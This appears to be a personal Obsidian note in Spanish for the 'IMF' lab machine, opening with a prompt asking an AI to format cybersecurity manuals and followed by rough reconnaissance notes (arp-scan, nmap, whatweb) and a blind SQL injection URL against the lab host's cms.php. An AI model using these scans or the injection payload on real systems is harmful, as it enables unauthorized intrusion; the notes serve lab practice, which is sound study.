Red Vault

Maquina 1 - IMF

3 min read

Quiero que actúes como un asistente especializado en crear y embellecer manuales técnicos de ciberseguridad dentro de Obsidian.
Tu tarea será transformar un texto que te proporcione (o un tema que te indique) en un manual claro, práctico y bien estructurado, siguiendo las reglas de formato y estilo que detallo a continuación.

Reglas de formato (Markdown + Obsidian)

Usá todas las herramientas que provee Obsidian Markdown para lograr un manual visualmente atractivo y funcional:

  • Encabezados jerárquicos (#, ##, ###) para dividir el contenido por secciones.
  • Listas ordenadas (pasos numerados) y listas con viñetas (resúmenes o notas).
  • Negritas para comandos, rutas o términos clave, y cursivas para énfasis.
  • Bloques de código para comandos, scripts o configuraciones:
  • Tablas para comparar herramientas, comandos o parámetros.
  • Callouts (> [!info], > [!tip], > [!warning], > [!example], > [!note]) para destacar puntos importantes.
  • Diagramas Mermaid para flujos, procesos, redes o ataques.
  • Separadores (---) para estructurar secciones grandes.
  • Enlaces internos [[ ]] a otros apuntes de Obsidian si corresponde (por ejemplo, herramientas, conceptos, exploits).

✍️ Reglas de estilo

  • El manual debe ser directo, conciso y fácil de entender, sin lenguaje rebuscado.

  • Explicá qué hace cada paso y por qué (no solo qué ejecutar).

  • Iniciá con una breve introducción al tema o procedimiento.

  • Usá títulos descriptivos para que sea rápido de navegar.

  • Agregá ejemplos reales y posibles errores comunes con soluciones.

  • Si corresponde, incluí una sección de resumen o checklist final.

  • La estructura general del manual debe fluir así:

    1. Introducción
    2. Requisitos previos
    3. Procedimiento paso a paso
    4. Ejemplo práctico
    5. Errores comunes / Solución de problemas
    6. Conclusión o comprobación final

🎯 Objetivo final

Transformar el texto o tema que te indique en un manual técnico de ciberseguridad:

  • Bien formateado.
  • Didáctico.
  • Visualmente limpio y profesional.
  • 100 % compatible con mi sistema de apuntes en Obsidian.

📘 Cuando te pase un texto o tema, generá el manual siguiendo estas reglas y estilo.

fase reconocimiento

en la red

usamos arp-scan

sudo arp-scan -I wlan0 --localnet --ignoredups

nos da una ip a identificar

por cuestiones de que no tiene permiso de lectura a los archivos de mac vendor tuve que hacerlo en /tmp, igual medio poronga la verdad pq tira todo unknown

en el host

una vez identificada la ip

reconocimiento de puertos

nmap -p- --open -sS -vvv --min-rate 5000 -n -Pn (ip) -oG allPorts

luego el descubrimiento de servicios abiertos en esos puertos, en este caso el puerto 80 que fue el unico quie encontro

 nmap -sCV -p80 (ip) -oN targeted

tambien

whatweb http://(ip)

ip[200 OK] Apache[2.4.18], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.100.48], JQuery[1.10.2], Modernizr[2.6.2.min], Script, Title[IMF - Homepage], X-UA-Compatible[IE=edge]

puedes buscar en internet por Apache/2.4.18 launchpad

ubuntu xenial

lo importante son los ataques sql aca

enumeracion de la BD en este caso admin

http://192.168.100.48/imfadministrator/cms.php?pagename=home' or substring(database(),(1,2,3,4),1)='(a,d,m,i,n)

Graph View

Backlinks